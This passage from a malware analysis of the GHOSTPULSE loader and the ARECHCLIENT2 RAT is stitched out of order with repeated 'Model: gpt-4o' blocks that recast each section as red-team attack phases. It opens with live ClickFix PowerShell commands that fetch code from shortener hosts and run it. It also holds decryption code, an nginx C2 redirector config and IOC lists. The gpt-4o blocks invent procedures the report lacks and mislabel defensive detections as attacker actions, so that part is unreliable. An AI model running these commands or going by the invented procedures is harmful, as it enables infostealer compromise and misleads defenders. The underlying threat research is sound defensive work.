  • Command: powershell (Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content | iex

Phase: Execution

  • Technique: Download and Execute via PowerShell
  • Command: powershell Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile "$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path "$env:TEMP\ComponentStyle.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"

Phase: Persistence (Via DLL Sideloading)

  • Technique: DLL Sideloading
  • Procedure: Utilize a benign executable (Crysta_X64.exe) to load a malicious DLL (DllXDownloadManager.dll).

Phase: Execution (Stage 1)

  • Technique: Decryption and Execution of Payload
  • Procedure: Decrypt the file Shonomteak.bxi using a DWORD addition operation to reveal the next stage payload.

Decryption of Shonomteak.bxi file

The malware then extracts the stage 2 code from the decrypted Shonomteak.bxi and injects it into a library it loads with LoadLibraryA. The library name is stored in the same decrypted file; in our case it is vssapi.dll.

The stage 2 function is then called with a structure parameter containing the filename of the IDAT PNG file, the stage 2 configuration that was inside the decrypted Shonomteak.bxi, and a boolean field b_detect_process, set to True in our case.

Structure used in stage 2

Stage 2

When the boolean field b_detect_process is set to True, the malware runs a function that checks whether any process from a configured list is running. If one is detected, execution is delayed by 5 seconds.

Delays execution by 5 seconds

In the GHOSTPULSE samples we analyzed previously, the configuration was hardcoded directly in the binary. This sample instead stores everything the malware needs to function in Shonomteak.bxi, including:

  • Hashes for the DLL names and Windows APIs
  • IDAT tag: used to find the start of the encrypted data in the PNG file
  • IDAT string: which is simply "IDAT"
  • Hashes of the processes to scan for

API fetching hashes stored in GHOSTPULSE configuration rather than hardcoded

Final thoughts on GHOSTPULSE

GHOSTPULSE has seen multiple updates. The use of the IDAT header method to store the encrypted payload, rather than the newer pixel-based method we discovered in 2024, may indicate that the builder for this family keeps both options available when compiling new samples.

Our configuration extractor performs payload extraction using both methods and can be used for mass analysis of samples. You can find the updated tool in our labs-releases repository.
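
The stage 1 and stage 2 logic described above (decrypt Shonomteak.bxi with a DWORD addition, read the configuration, then use the IDAT tag and IDAT string to find the encrypted payload inside the PNG) can be reproduced statically. The Python below is an added example and is not Elastic's configuration extractor: it assumes the addend is the first DWORD of the .bxi file and that the decrypted configuration is simply a 4-byte tag followed by the host library name, neither of which the post specifies. The PNG chunk walk is real PNG framing; the sample .bxi and PNG are constructed inline. The returned payload is left encrypted, since the post does not describe that layer.

```python
import struct
import zlib
from typing import Optional

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def dword_add_decrypt(blob: bytes) -> bytes:
    """Assumed layout for the DWORD-addition scheme: the first DWORD is the key and
    every following DWORD is recovered by adding it modulo 2**32. The post only says
    a DWORD addition with a value stored in the file is used; the key position is
    this example's assumption."""
    if len(blob) < 8 or (len(blob) - 4) % 4:
        raise ValueError("expected a key DWORD followed by whole DWORDs")
    key, = struct.unpack_from("<I", blob, 0)
    n = (len(blob) - 4) // 4
    words = struct.unpack_from(f"<{n}I", blob, 4)
    return struct.pack(f"<{n}I", *((w + key) & 0xFFFFFFFF for w in words))


def dword_add_encrypt(plain: bytes, key: int) -> bytes:
    """Inverse of the above; used only to build the constructed sample."""
    padded = plain + b"\x00" * (-len(plain) % 4)
    words = struct.unpack(f"<{len(padded) // 4}I", padded)
    return struct.pack("<I", key) + struct.pack(
        f"<{len(words)}I", *((w - key) & 0xFFFFFFFF for w in words))


def parse_config(plain: bytes) -> dict:
    """Constructed stand-in for the decrypted Shonomteak.bxi: a 4-byte IDAT tag then
    the NUL-terminated host library name (vssapi.dll in the post). Assumed layout."""
    return {"idat_tag": plain[:4],
            "host_library": plain[4:].split(b"\x00", 1)[0].decode("ascii")}


def iter_png_chunks(data: bytes):
    """Walk real PNG chunk framing: big-endian length, 4-byte type, data, CRC32."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        if pos + 12 + length > len(data):
            break
        body = data[pos + 8:pos + 8 + length]
        crc, = struct.unpack_from(">I", data, pos + 8 + length)
        yield ctype, body, crc == zlib.crc32(ctype + body)
        pos += 12 + length
        if ctype == b"IEND":
            break


def find_idat_payload(png: bytes, idat_string: bytes, tag: bytes) -> Optional[bytes]:
    """Return the data that follows the configured tag inside an IDAT chunk, plus any
    IDAT chunks immediately after it. CRCs are not enforced: a builder appending
    payload chunks need not fix them up, and the loader does not care."""
    found, parts = False, []
    for ctype, body, _crc_ok in iter_png_chunks(png):
        if ctype != idat_string:
            if found:
                break
            continue
        if not found:
            if body.startswith(tag):
                found = True
                parts.append(body[len(tag):])
        else:
            parts.append(body)
    return b"".join(parts) if found else None


def recover_stage_payload(bxi: bytes, png: bytes):
    """Stage 1 as described: decrypt the .bxi, read the config, then use its IDAT
    tag to locate the (still encrypted) next-stage payload inside the PNG."""
    cfg = parse_config(dword_add_decrypt(bxi))
    return cfg, find_idat_payload(png, b"IDAT", cfg["idat_tag"])


# ---- constructed sample inputs (not real campaign artifacts) ----
SAMPLE_TAG = b"\x1b\x2c\x3d\x4e"
CONFIG_PLAINTEXT = SAMPLE_TAG + b"vssapi.dll\x00"
SAMPLE_BXI = dword_add_encrypt(CONFIG_PLAINTEXT, 0x1F3D5B79)
SAMPLE_PAYLOAD = bytes((i * 73 + 5) & 0xFF for i in range(64))


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def build_sample_png(tag: bytes = SAMPLE_TAG) -> bytes:
    """A 1x1 RGBA PNG with the payload appended as extra IDAT chunks after the image data."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)
    scanline = zlib.compress(b"\x00\x00\x00\x00\x00")  # filter byte + one transparent pixel
    return (PNG_SIGNATURE
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", scanline)
            + png_chunk(b"IDAT", tag + SAMPLE_PAYLOAD[:24])
            + png_chunk(b"IDAT", SAMPLE_PAYLOAD[24:])
            + png_chunk(b"IEND", b""))
```

Searching by chunk type rather than by a raw byte scan for "IDAT" matters in practice: the tag can legitimately appear inside compressed image data, and walking the chunk table also tells you where the real image ends and the appended payload begins.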

Model: gpt-4o

Phase: Initial Access

  • Technique: Decryption of Payload
  • Procedure: The malware decrypts the Shonomteak.bxi file to extract the stage 2 code.

Phase: Execution

  • Technique: DLL Injection
  • Procedure: The malware injects the decrypted stage 2 code into a loaded library using the LibraryLoadA function with the name vssapi.dll, which is obtained from the decrypted file.

Phase: Configuration Injection

  • Technique: Parameterized Execution
  • Procedure: The stage 2 function is executed with parameters including the IDAT PNG file's filename, stage 2 configuration, and a boolean field b_detect_process set to True.

Phase: Defense Evasion

  • Technique: Delayed Execution
  • Procedure: If specific processes are detected running, the malware delays execution by 5 seconds to potentially evade behavior-based detection.

Phase: Reconnaissance

  • Technique: Process Enumeration
  • Procedure: The malware scans for a list of processes using hashes stored in the Shonomteak.bxi configuration to determine if they are running.

Phase: Payload Storage

  • Technique: Obfuscation via Image Header
  • Procedure: The malware uses the IDAT tag in a PNG file to locate the start of encrypted data, differing from previous methods that used pixel storage.

Payload extraction from the GHOSTPULSE sample

ARECHCLIENT2

In 2025, a notable increase in activity involving ARECHCLIENT2 (SectopRAT) was observed. This heavily obfuscated .NET remote access tool, initially identified in November 2019 and known for its information-stealing features, is now being deployed by GHOSTPULSE through the ClickFix social engineering technique. Our prior research documented GHOSTPULSE deploying ARECHCLIENT2 as early as 2023.

The payload GHOSTPULSE deploys in a newly created process is an x86 native .NET loader, which in turn loads ARECHCLIENT2. The loader goes through 3 steps:

  • Patching AMSI
  • Extracting and decrypting the payload
  • Loading the CLR, then reflectively loading ARECHCLIENT2

Main entry of the .NET loader

Interestingly, its error handling for debugging purposes is still present, in the form of message boxes displayed with the MessageBoxA API. For example, when it fails to find the .tls section, a message box with the string "D1" is displayed.

Debugging/error messages through a message box

The following table lists all the error messages and their meaning:

Message | Description
F1 | LoadLibraryExW hooking failed
F2 | AMSI patching failed
D1 | Unable to find .tls section
W2 | Failed to load CLR

The malware sets up a hook on the LoadLibraryExW API. This hook waits for amsi.dll to be loaded, then sets another hook on AmsiScanBuffer, effectively bypassing AMSI.

Model: gpt-4o

Phase: Initial Access

  • Technique: Social Engineering via Clickfix Technique
  • Procedure: The attacker uses the Clickfix social engineering technique to distribute ARECHCLIENT2 (SectopRAT).

Phase: Execution

  • Technique: Reflective DLL Injection
  • Procedure: The payload executed by GHOSTPULSE utilizes a .NET loader which:
    • Patches AMSI: Sets a hook on the LoadLibraryExW API to wait for amsi.dll, then hooks AmsiScanBuffer for AMSI bypass.
    • Extracts and Decrypts the Payload: Decrypts and prepares the main ARECHCLIENT2 payload for execution.
    • Loads the CLR and Reflectively Loads ARECHCLIENT2: Uses the CLR to load the main RAT payload into memory.

Phase: Defense Evasion

  • Technique: AMSI Bypass
  • Procedure: The .NET loader patches AMSI by setting hooks on the relevant APIs, bypassing malware scanning.

Phase: Error Handling and Debugging

  • Technique: Use of Native API for Error Messaging
  • Procedure: Utilizes MessageBoxA API to display error messages for debugging, such as "F1" for LoadLibraryExW hooking failure and "F2" for AMSI patching failure.

Hooking LoadLibraryExW

After this, the loader fetches the pointer to the .tls section in memory by parsing the PE headers. The first 0x40 bytes of this section serve as the XOR key, and the remaining bytes contain the encrypted ARECHCLIENT2 sample, which the loader then decrypts.

Payload decryption routine

Finally, it loads the .NET Common Language Runtime (CLR) in memory with the CLRCreateInstance Windows API before reflectively loading ARECHCLIENT2. The following is an example of how it is performed.

ARECHCLIENT2 is a potent remote access trojan and infostealer, designed to target a broad spectrum of sensitive user data and system information. The malware's core objectives primarily focus on:

Credential and Financial Theft: ARECHCLIENT2 explicitly targets cryptocurrency wallets, browser-saved passwords, cookies, and autofill data. It also goes after credentials for FTP, VPN, Telegram, Discord, and Steam.

dnSpy view of the StealerSettingConfigParce class

System Profiling and Reconnaissance: ARECHCLIENT2 gathers extensive system details, including the operating system version, hardware information, IP address, machine name, and geolocation (city, country, and time zone).
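
A static version of the decryption routine just described, written as an added example rather than taken from the loader or from Elastic's tooling: walk the PE section table to find .tls, take the first 0x40 bytes as the key, XOR the rest, and check that a PE came out. The only assumption beyond the post is that the 0x40-byte key repeats over the whole ciphertext; the post gives the key and data positions but not how the key is applied. The minimal PE32 used as input is constructed in the block.

```python
import struct
from typing import Optional, Tuple

KEY_LEN = 0x40  # first 0x40 bytes of .tls are the key, per the post


def find_section(pe: bytes, name: bytes) -> Optional[Tuple[int, int]]:
    """Return (PointerToRawData, SizeOfRawData) of a named section by walking the
    on-disk PE section table: e_lfanew -> COFF header -> optional header -> table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size
    for i in range(num_sections):
        sec_name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + i * 40)
        if sec_name.rstrip(b"\x00") == name:
            return raw_ptr, raw_size
    return None


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR with a key that repeats every len(key) bytes (the cycling is assumed)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def extract_tls_payload(pe: bytes) -> bytes:
    """Static equivalent of the loader's routine: locate .tls, split key || ciphertext,
    decrypt, and sanity-check that a PE (ARECHCLIENT2 is a .NET assembly) came out."""
    loc = find_section(pe, b".tls")
    if loc is None:
        raise ValueError("D1: unable to find .tls section")
    off, size = loc
    section = pe[off:off + size]
    if len(section) <= KEY_LEN:
        raise ValueError(".tls section too small to hold key and payload")
    plain = xor_repeating(section[KEY_LEN:], section[:KEY_LEN])
    if plain[:2] != b"MZ":
        raise ValueError("decrypted data does not start with MZ")
    return plain


# ---- constructed sample (not the real loader): a minimal PE32 whose only section
# is a .tls carrying key || XOR(payload) ----
SAMPLE_KEY = bytes((i * 37 + 11) & 0xFF for i in range(KEY_LEN))
SAMPLE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"constructed stand-in for the .NET assembly".ljust(128, b"\x00")


def build_sample_loader(payload: bytes, key: bytes) -> bytes:
    sect = key + xor_repeating(payload, key)
    e_lfanew, opt_size = 0x40, 0xE0
    hdr_end = e_lfanew + 4 + 20 + opt_size + 40          # one section header
    raw_ptr = (hdr_end + 0x1FF) & ~0x1FF                 # 0x200 file alignment
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x2102)  # i386, 1 section
    opt = struct.pack("<H", 0x10B) + b"\x00" * (opt_size - 2)            # PE32 magic, rest zero
    sec = struct.pack("<8sIIIIIIHHI", b".tls", len(sect), 0x1000, len(sect), raw_ptr,
                      0, 0, 0, 0, 0xC0000040)
    image = dos + b"PE\x00\x00" + coff + opt + sec
    return image + b"\x00" * (raw_ptr - len(image)) + sect


if __name__ == "__main__":
    recovered = extract_tls_payload(build_sample_loader(SAMPLE_PAYLOAD, SAMPLE_KEY))
    print("payload recovered:", recovered == SAMPLE_PAYLOAD, "size", len(recovered))
```

On a real sample the "MZ" check is also the quickest way to test the key-cycling assumption: if the first two bytes decrypt correctly but the rest is noise, the key is applied differently from the way assumed here.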

Model: gpt-4o

Phase: Execution

  • Technique: Reflective DLL Injection
  • Procedure: The loader hooks LoadLibraryExW to intercept library loading, decrypts the ARECHCLIENT2 payload from the .tls section using a custom XOR routine, and then loads it into memory. The loader leverages the CLRCreateInstance Windows API to load the .NET Common Language Runtime (CLR) before executing ARECHCLIENT2.

Phase: Credential Access

  • Technique: Credential Dumping
  • Procedure: ARECHCLIENT2 targets credential stores including cryptocurrency wallets, browser-saved passwords, autofill data, and specific applications like FTP, VPN, Telegram, Discord, and Steam.

Phase: Discovery

  • Technique: System Information Discovery
  • Procedure: ARECHCLIENT2 collects system details such as operating system version, hardware information, machine name, IP address, and geolocation data.

Note: Specific command-line syntax was not provided in the report; inferred procedures are based on described behavior and common attack methodology.

We've identified that both captcha-hosting domains are linked to a digital advertising agency with a long operational history. Further investigation reveals that the company has consistently used client subdomains to host various content, including PDFs and forms, for advertising purposes. We assess that the attacker has likely compromised the server 50.57.243[.]90 and is exploiting the company's existing infrastructure and advertising reach to facilitate widespread malicious activity.

Further down the attack chain, analysis of the ARECHCLIENT2 C2 IPs (143.110.230[.]167 and 144.172.97[.]2) revealed additional campaign infrastructure. The two servers are hosted on different autonomous systems, AS14061 and AS14956.

Pivoting on a shared banner hash (@ValidinLLC's HOST-BANNER_0_HASH, the hash of the web server's response banners) revealed 120 unique servers across a range of autonomous systems over the last seven months. Of these 120, 19 had previously been labeled by other vendors as "Sectop RAT" (aka ARECHCLIENT2), as documented in the maltrail repo.

Model: gpt-4o

Based on the provided information, the report lacks specific command lines or explicit procedures. However, we can infer some likely techniques used by the threat actor. Here’s how the attack might have been conducted, structured in phases:

Phase: Initial Access

  • Technique: Server Exploitation
  • Procedure: The attacker likely exploited vulnerabilities in the company’s server infrastructure, specifically targeting subdomains used for hosting PDFs and forms.

Phase: Command and Control

  • Technique: Remote Access Trojan (Sectop RAT)
  • Procedure: Use of "Sectop RAT" to maintain persistent access and control over compromised systems.

Phase: Attack Infrastructure Setup

  • Technique: Distributed Infrastructure
  • Procedure: Utilization of multiple servers within different autonomous systems to manage separate components of the campaign and evade detection.

Additional Considerations:

  • Continuation of malicious activity by leveraging compromised infrastructure for phishing, data exfiltration, or further propagation.
  • Likely use of obfuscation and encryption techniques to hide communication between the compromised systems and the C2 servers.

To create specific emulation commands for a red team, more detailed information on the attacker’s TTPs would be needed. This could include examining specific vulnerabilities exploited, RAT functionalities, and precise methods of server communication.

dnSpy view of the ScanResult class

Command Execution: ARECHCLIENT2 receives and executes commands from its command-and-control (C2) server, granting attackers remote control over infected systems.

ARECHCLIENT2 connects to its C2 at 144.172.97[.]2, which is hardcoded in the binary as an encrypted string, and also retrieves its secondary C2 IP (143.110.230[.]167) from a hardcoded pastebin link, https://pastebin[.]com/raw/Wg8DHh2x.

ARECHCLIENT2 configuration from dnSpy

Infrastructure analysis

The malicious captcha page was hosted under two domains, clients.dealeronlinemarketing[.]com and clients.contology[.]com, under the URIs /captcha and /Client, both resolving to the IP address 50.57.243[.]90.

Model: gpt-4o

Phase: Command and Control

  • Technique: Remote Command Execution via Malware
  • Procedure: ARECHCLIENT2 receives commands from a C2 server, facilitating remote control over infected systems. The malware connects to its primary and secondary C2 servers.

Phase: Infrastructure Analysis

  • Technique: Malicious Domain Hosting
  • Procedure: The attacker hosts a malicious captcha under domains with specific URIs pointing to an IP used for infrastructure setup.

Note: The details on exact command-line executions are not provided, but understanding the malware's capability to execute commands remotely on receiving instructions from C2 is crucial for emulation.

ARECHCLIENT2 C2 Server Profile, courtesy @censysio

The service on port 9000 returns Windows server headers, whereas the SSH and NGINX HTTP services both identify the operating system as Ubuntu. This suggests the C2 sits behind a reverse proxy that protects the actual C2 team server by keeping disposable front-end redirectors in front of it.

ARECHCLIENT2 IOC:

HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20

This is an active campaign, and its infrastructure has been built and torn down at a high cadence over the last seven months. As of publication, the following C2 nodes are still active:

Value | First Seen | Last Seen
66.63.187.22 | 2025-06-15 | 2025-06-15
45.94.47.164 | 2025-06-02 | 2025-06-15
84.200.17.129 | 2025-06-04 | 2025-06-15
82.117.255.225 | 2025-03-14 | 2025-06-15
45.77.154.115 | 2025-06-05 | 2025-06-15
144.172.94.120 | 2025-05-20 | 2025-06-15
79.124.62.10 | 2025-05-15 | 2025-06-15
82.117.242.178 | 2025-03-14 | 2025-06-15
195.82.147.132 | 2025-04-10 | 2025-06-15
62.60.247.154 | 2025-05-18 | 2025-06-15
91.199.163.74 | 2025-04-03 | 2025-06-15
172.86.72.81 | 2025-03-13 | 2025-06-15
107.189.24.67 | 2025-06-02 | 2025-06-15
143.110.230.167 | 2025-06-08 | 2025-06-15
185.156.72.80 | 2025-05-15 | 2025-06-15
85.158.110.179 | 2025-05-11 | 2025-06-15
144.172.101.228 | 2025-05-13 | 2025-06-15
192.124.178.244 | 2025-06-01 | 2025-06-15
107.189.18.56 | 2025-04-27 | 2025-06-15
194.87.29.62 | 2025-05-18 | 2025-06-15
185.156.72.63 | 2025-06-12 | 2025-06-12
193.149.176.31 | 2025-06-08 | 2025-06-12

Model: gpt-4o

The provided report focuses on the infrastructure setup of a C2 server, specifically highlighting a reverse proxy configuration. Unfortunately, the text lacks explicit command lines or procedures related to how attackers might operationalize this infrastructure. However, I can infer some possible tactics based on common practices:

Phase: Infrastructure Setup

  • Technique: Reverse Proxy Configuration
  • Procedure: The attacker configures a reverse proxy using NGINX on Ubuntu systems to mask the real C2 server. Traffic directed to a Windows server on port 9000 is forwarded to disposable front-end redirectors. This setup protects the actual C2 server infrastructure and allows for rapid changes by maintaining active nodes.

Phase: Operational Resilience

  • Technique: Dynamic Infrastructure Management
  • Procedure: The attacker frequently builds and tears down nodes to evade detection and maintain operational security. This involves scripting or automation tools to quickly spin up new instances and deploy configurations repetitively.

For a red team to emulate such behavior, they could utilize:

  • Command for Reverse Proxy (NGINX Example):

    ```nginx
    server {
        listen 80;
        location / {
            proxy_pass http://<actual-C2-IP>:9000;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        }
    }
    ```

  • Infrastructure Automation (Terraform/Ansible):
    • Set up scripts to rapidly deploy and destroy cloud instances.
    • Automate configuration of servers to quickly establish reverse proxy settings.

Any more detailed TTPs would require additional context or example commands from the report.

ARECHCLIENT2 Host Banner Hash Pivot, courtesy @ValidinLLC

Focused validation of the latest occurrences (first seen after June 1, 2025) against VirusTotal shows that community members had previously labeled all 13 as Sectop RAT C2.

All these servers share a similar configuration:

  • Running Canonical Linux
  • SSH on 22
  • Unknown TCP on 443
  • Nginx HTTP on 8080, and
  • HTTP on 9000 (C2 port)
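
Profile matching of the kind used for this pivot, as an added example (it is neither Censys's nor Validin's logic, and it does not compute the banner hash, which the post does not describe): given constructed host scan records, flag hosts exposing the 22/443/8080/9000 service set and, separately, those whose port-9000 banner reports a different operating system than the rest of the host, the reverse-proxy tell noted above. The record layout and the documentation-range addresses are assumptions made for the example.

```python
from typing import Dict, List

# Constructed scan records (documentation-range addresses, not the post's IOCs).
# Each service carries the port, what the banner identified, and the OS the banner
# implied, mirroring the fields a host record from an internet scanner exposes.
SAMPLE_HOSTS = [
    {"ip": "192.0.2.10", "services": [
        {"port": 22, "product": "OpenSSH", "os_hint": "Ubuntu"},
        {"port": 443, "product": "unknown", "os_hint": None},
        {"port": 8080, "product": "nginx", "os_hint": "Ubuntu"},
        {"port": 9000, "product": "http", "os_hint": "Windows"}]},
    {"ip": "192.0.2.11", "services": [
        {"port": 22, "product": "OpenSSH", "os_hint": "Ubuntu"},
        {"port": 80, "product": "nginx", "os_hint": "Ubuntu"},
        {"port": 443, "product": "nginx", "os_hint": "Ubuntu"}]},
    {"ip": "198.51.100.7", "services": [
        {"port": 22, "product": "OpenSSH", "os_hint": "Ubuntu"},
        {"port": 443, "product": "unknown", "os_hint": None},
        {"port": 8080, "product": "nginx", "os_hint": "Ubuntu"},
        {"port": 9000, "product": "http", "os_hint": "Ubuntu"}]},
]

# The service profile shared by the pivoted servers, as listed above. A None
# product means only the open port is required (443 is "unknown TCP" in the post).
PROFILE = {22: "openssh", 443: None, 8080: "nginx", 9000: "http"}
C2_PORT = 9000


def matches_profile(host: dict) -> bool:
    """True when every profile port is open and, where a product is named, the
    banner agrees with it."""
    by_port = {s["port"]: s for s in host["services"]}
    for port, product in PROFILE.items():
        svc = by_port.get(port)
        if svc is None:
            return False
        if product and product not in svc["product"].lower():
            return False
    return True


def proxy_mismatch(host: dict) -> bool:
    """True when the C2 port identifies a different OS than the other services on
    the host, the sign the post reads as a reverse proxy in front of the team server."""
    others = {s["os_hint"] for s in host["services"] if s["os_hint"] and s["port"] != C2_PORT}
    c2 = next((s["os_hint"] for s in host["services"] if s["port"] == C2_PORT), None)
    return bool(c2 and others and c2 not in others)


def triage(hosts: List[dict]) -> Dict[str, str]:
    """Label each host 'profile+proxy' (strongest), 'profile', or 'no match'."""
    out = {}
    for h in hosts:
        if not matches_profile(h):
            out[h["ip"]] = "no match"
        elif proxy_mismatch(h):
            out[h["ip"]] = "profile+proxy"
        else:
            out[h["ip"]] = "profile"
    return out


if __name__ == "__main__":
    for ip, label in triage(SAMPLE_HOSTS).items():
        print(f"{ip:16} {label}")
```

The port set alone is a weak signal (plenty of legitimate hosts run nginx on 8080 and something on 9000), which is why the post validates the pivot against VirusTotal labels; the OS mismatch on the C2 port is the more specific indicator and is worth keeping as a separate field in the output rather than folding it into one score.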

Model: gpt-4o

Phase: Initial Access

  • Technique: Exploit Public-Facing Application
  • Procedure: The threat actor leverages vulnerabilities in publicly exposed services on Linux servers to gain access. Likely targeting SSH or HTTP services.

Phase: Execution

  • Technique: Remote Code Execution via SSH
  • Procedure: The attacker likely uses SSH to execute commands remotely on the compromised Linux servers.

Phase: Persistence

  • Technique: Backdoor Installation
  • Procedure: Installation of Sectop RAT on compromised systems to maintain persistent access. Configured to run on HTTP port 9000.

Phase: Command and Control

  • Technique: Custom C2 Communication
  • Configuration: The Sectop RAT communicates with C2 over HTTP on port 9000.
  • Procedure: The RAT uses HTTP requests to the C2 server to receive further instructions.

Phase: Defense Evasion

  • Technique: Use of Standard Application Layer Protocols
  • Procedure: The threat actor uses standard HTTP and encrypted SSH communications to blend in with normal traffic and evade detection.

Note: Specific command lines or scripts were not detailed in the report, so likely procedures were inferred based on typical attack patterns and reported behaviors.

Value | First Seen | Last Seen
45.141.87.249 | 2025-06-12 | 2025-06-12
176.126.163.56 | 2025-05-06 | 2025-06-12
185.156.72.71 | 2025-05-15 | 2025-06-12
91.184.242.37 | 2025-05-15 | 2025-06-12
45.141.86.159 | 2025-05-15 | 2025-06-12
67.220.72.124 | 2025-06-05 | 2025-06-12
45.118.248.29 | 2025-01-28 | 2025-06-12
172.105.148.233 | 2025-06-03 | 2025-06-10
194.26.27.10 | 2025-05-06 | 2025-06-10
45.141.87.212 | 2025-06-08 | 2025-06-08
45.141.86.149 | 2025-05-15 | 2025-06-08
172.235.190.176 | 2025-06-08 | 2025-06-08
45.141.86.82 | 2024-12-13 | 2025-06-08
45.141.87.7 | 2025-05-13 | 2025-06-06
185.125.50.140 | 2025-04-06 | 2025-06-03

Conclusion

This multi-stage campaign effectively leverages ClickFix social engineering for initial access, deploying the GHOSTPULSE loader to deliver an intermediate .NET loader and, ultimately, the memory-resident ARECHCLIENT2 payload. This layered attack chain harvests extensive credential, financial, and system data while also granting attackers remote control over compromised machines.

MITRE ATT&CK

Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.

Tactics

Tactics represent the why of a technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action.

  • Initial Access
  • Execution
  • Defense Evasion
  • Command and Control
  • Collection

Techniques

Techniques represent how an adversary achieves a tactical goal by performing an action.

  • Phishing
    • Spearphishing Link
  • User Execution
    • Malicious Link
    • Malicious File
  • Command and Scripting Interpreter
    • PowerShell
  • Deobfuscation/Decoding
  • DLL Sideloading

Model: gpt-4o

Phase: Initial Access

  • Technique: Phishing via Malicious Link
  • Procedure: The attacker uses ClickFix social engineering to lure victims into clicking on a malicious link within a phishing email.

Phase: Execution

  • Technique: User Execution of Malicious File
  • Procedure: After clicking the malicious link, a file is delivered which the user executes, initiating the attack chain.

  • Technique: Command and Scripting Interpreter - PowerShell
  • Command: Likely PowerShell execution using techniques such as powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden <Commands>

Phase: Defense Evasion

  • Technique: Deobfuscation/Decoding
  • Procedure: The attack utilizes obfuscated scripts or encoding to evade defenses.

  • Technique: DLL Sideloading
  • Procedure: Exploiting legitimate applications to load a malicious DLL file.

Phase: Persistence

  • Technique: GHOSTPULSE Loader Deployment
  • Procedure: Deploys the GHOSTPULSE loader to maintain a foothold in the system.

Phase: Execution (Continued)

  • Technique: .NET Loader Execution
  • Procedure: The GHOSTPULSE loader executes an intermediate .NET loader.

Phase: Command and Control

  • Technique: Memory-Resident Payload
  • Procedure: Deployment of the ARECHCLIENT2 payload, which resides in memory to evade detection.

Phase: Collection

  • Technique: Credential Gathering
  • Procedure: Gathers extensive credentials, financial, and system data from compromised machines.

Phase: Impact

  • Technique: Remote Control
  • Procedure: Provides attackers with remote control capabilities over the compromised system.

  • Reflective Loading
  • User Interaction
  • Ingress Tool Transfer
  • System Information Discovery
  • Process Discovery
  • Steal Web Session Cookie

Detecting [malware]

Detection

Elastic Defend detects this threat with the following behavior protection rules:

  • Suspicious Command Shell Execution via Windows Run
  • DNS Query to Suspicious Top Level Domain
  • Library Load of a File Written by a Signed Binary Proxy
  • Connection to WebService by a Signed Binary Proxy
  • Potential Browser Information Discovery

YARA

  • Windows_Trojan_GhostPulse
  • Windows_Trojan_Arechclient2

Observations

The following observables were discussed in this research.

Observable | Type | Name | Reference
clients.dealeronlinemarketing[.]com | domain | Captcha subdomain |
clients.contology[.]com | domain | Captcha subdomain |
koonenmagaziner[.]click | domain | |
50.57.243[.]90 | ipv4-addr | clients.dealeronlinemarketing[.]com & clients.contology[.]com IP address |
144.172.97[.]2 | ipv4-addr | ARECHCLIENT2 C&C server |
143.110.230[.]167 | ipv4-addr | ARECHCLIENT2 C&C server |
pastebin[.]com/raw/Wg8DHh2x | url | Contains ARECHCLIENT2 C&C server IP |
2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a | SHA-256 | DivXDownloadManager.dll | GHOSTPULSE
a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 | SHA-256 | Heeschamjiet.rc | PNG GHOSTPULSE
f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 | SHA-256 | | DOTNET LOADER
4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 | SHA-256 | | ARECHCLIENT2

References

The following were referenced throughout the above research:

  • https://x.com/SI_FalconTeam/status/1915790796948643929
  • https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics

Model: gpt-4o

Phase: Execution

  • Technique: Reflective DLL Injection
  • Procedure: Threat actor likely utilized reflective loading to inject malicious DLLs into memory without touching disk.

Phase: Defense Evasion

  • Technique: User Interaction for Execution
  • Procedure: Social engineering techniques to trick users into executing malicious payloads or enabling macros.

Phase: Initial Access

  • Technique: Ingress Tool Transfer
  • Procedure: Tools and payloads transferred to the target environment, possibly using obfuscated methods.

Phase: Discovery

  • Technique: System Information Discovery
  • Procedure: Commands executed to gather system information, such as OS version and architecture.

  • Technique: Process Discovery
  • Procedure: Enumerating running processes to identify potential targets for exploitation.

Phase: Credential Access

  • Technique: Steal Web Session Cookie
  • Procedure: Threat actor may have used scripts or malware to extract web session cookies from browsers.

Phase: Impact

  • Technique: Detecting Malware
  • Procedure: Utilized YARA rules and behavioral detection to identify suspicious activities such as:
    • Suspicious Command Shell Execution via Windows Run.
    • DNS Query to Suspicious Top Level Domain.
    • Library Load of a File Written by a Signed Binary Proxy.
    • Connection to WebService by a Signed Binary Proxy.
